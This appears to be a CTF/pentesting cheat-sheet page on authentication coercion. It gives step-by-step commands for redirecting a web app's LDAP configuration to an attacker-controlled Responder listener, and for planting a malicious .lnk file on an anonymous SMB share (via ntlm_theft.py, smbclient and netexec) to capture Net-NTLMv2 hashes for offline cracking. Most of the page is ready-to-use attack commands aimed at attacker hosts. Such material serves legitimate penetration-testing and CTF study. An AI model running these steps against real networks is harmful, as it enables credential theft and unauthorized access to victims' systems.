> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/network-authentication/initial-access-network-authentication-coercion.md).

# Coercion

## LDAP Coercion Via Web App Config

Modify a web application's LDAP configuration to point to a hostile server to capture credentials via coerced authentication. This works when an application authenticates to LDAP using service accounts and the LDAP server address is attacker-controllable.

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in authentication servers, including one for LDAP, that will answer to specific queries on-the-fly. On the attacker machine, run Responder targeting the interface facing the vulnerable application:

```bash
sudo responder -I <interface> -v
```

In the vulnerable web application (e.g., PWM Configuration Manager), navigate to the LDAP settings. Add or modify an existing LDAP server entry to point to the attacker's IP on port 389 (standard LDAP):

```
ldap://<attacker_ip>:389
```

Trigger a connection test or save the configuration. The application will attempt to authenticate to the attacker-controlled LDAP server. Responder will capture the credentials sent by the application's service account. Responder will capture the NTLMv2 hash or the plaintext password if a simple bind is used.

***

## SMB .lnk NTLM Theft

Place a malicious `.lnk` file on an anonymously writable SMB share or directory that other users are likely to view. When Windows Explorer attempts to generate a thumbnail for the `.lnk` file, it will try to load the icon specified in the link. By pointing the icon path to a remote SMB share on your attacker-controlled machine, the victim's machine will attempt to authenticate, allowing you to capture their NTLM hash using a tool like Responder or `nxc smb server`. When Windows Explorer attempts to display the contents of the directory containing the malicious LNK file, it tries to load the icon, initiating an SMB connection to the attacker's server, forcing the victim's machine to send the user's Net-NTLMv2 hash.

Generate the `.lnk` file pointing to your SMB server using the `ntlm_theft.py` script from `pth-toolkit`:

```bash
python3 ntlm_theft.py -g lnk -s $MYIP -f exploit
```

Connect anonymously to the target SMB share and upload the generated `.lnk` file. Replace `$VMIP` with the target machine's IP and `Data` with the share name. Replace `onboarding\` with the specific directory path if needed.

```bash
smbclient \\$VMIP\Data -U \'\' --password=\'\'
smb: \> cd onboarding\
smb: \onboarding\> put exploit.lnk
```

Alternatively, you can use a non-interactive `smbclient` command:

```bash
smbclient \\\\$VMIP\\Data -N -c 'put exploit.lnk onboarding\\exploit.lnk'
```

Or use `netexec` (`nxc`) for the file transfer:

```bash
netexec smb $VMIP -u '' -p '' -M put -o LOCAL=exploit.lnk,REMOTE=onboarding\\exploit.lnk
```

Ensure your attacker machine (`$MYIP`) is running a tool like Responder or `nxc smb server` configured to listen for SMB connections *before* the victim views the directory containing the malicious `.lnk` file. Configure Responder or NetExec to listen for incoming SMB connections on your attacker machine. Capture the NTLMv2 hash and crack it offline.
